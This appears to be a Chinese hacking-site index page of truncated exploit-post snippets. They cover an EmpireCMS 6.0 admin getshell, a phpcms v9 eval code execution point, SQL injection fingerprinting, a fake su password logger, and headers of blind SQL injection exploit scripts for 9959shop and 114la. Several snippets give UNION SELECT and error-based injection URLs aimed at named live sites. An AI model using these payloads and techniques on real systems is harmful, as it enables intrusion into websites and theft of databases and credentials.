EmpireCMS 6.0管理权限GETSHELL
Team : hExIe Team Author : HYrz TestEd On : IIS6.0+2k3 分析过程 : \e\class\functions.php 2609行 ReUserjs 函数. view sourceprint?function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir(...
Team : hExIe Team Author : HYrz TestEd On : IIS6.0+2k3 分析过程 : \e\class\functions.php 2609行 ReUserjs 函数. view sourceprint?function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir(...
1.判断是否存在注入点的方法和其他数据库类似,and 1=1 和and 1=2 2.判断数据库为oracle 提交注释字符/*,返回正常即是MySQL,否则继续提交注释符号--,该符号是Oracle和MsSQL支持的注释符,返回正常就需要继续判断。可以继续提交多语句支持符号;如果支持多行查询,说明是MSSQL,因为Oracle不支持多行查询,可以继续提交查询语句: and exist(select...
ZKEYS 是一个国内比较常用的IDC虚拟主机系统 原名:AutoHost 后改名:ZKEYS 虚拟管理系统 支持.NET 的话 查找注册表 HKEY_LOCAL_MACHINE\SOFTWARE\ZKEYS 默认会有 ZKEYS 路径 找到路径后 如果找不到 可以猜 一般都在根目录 ZKEYS 管理系统对 目录的限制 一般都不怎么严谨 所以这个时候你懂得。。。 一般都在硬盘的根目录 打开 *\Z...
关于“PHP彩蛋”的说法也许很多老PHPer已经都知道或听说了,好像是早在PHP4版本的时候就有彩蛋了,挺好玩儿的,可能近年来逐渐被人们遗忘了,其实彩蛋功能在PHP脚本引擎默认情况下是开启。 下面就用Discuz官方论坛做一下测试: http://www.discuz.net/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 http://www.discuz.n...
phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 function string2array($data) { if($data == '') return array(); eval("\$array = $data;"); return $array; } 比如投票结果统计(需要后台权限) /moudles/vo...
在webbackdoor本身是root(可能性小的可怜)或通过某漏洞溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧! 先看第一种,kpr-fakesu.c V0.9beta167 fucksu.c /* * kpr-fakesu.c V0.9beta167 ;P * by...
以下是利用工具: <?php print_r(‘ +—————————————————————————+ 9959网店系统 v5.0 Blind SQL injection exploit by mendou 05 官方网站: www.9959shop.com +—————————————————————————+ ‘); if ($argc < 2) { print_r(‘ +———...
Disqus是世界著名的实时评论系统,如果对其不了解,可以自己Google一下 好吧,其实这漏洞太弱了 其实就是news.php对id值没过滤。看实例吧: https://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8+from+information_schem...
这是一个伪静态盲注点root权限 可查看所有数据库信息~~ 详细说明: 这是一个盲注点root权限 可查看所有数据库信息 获取数据库用户 http://pai.pindao.com/match/api/share/id/630 and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(user as...
<?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02 Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' ...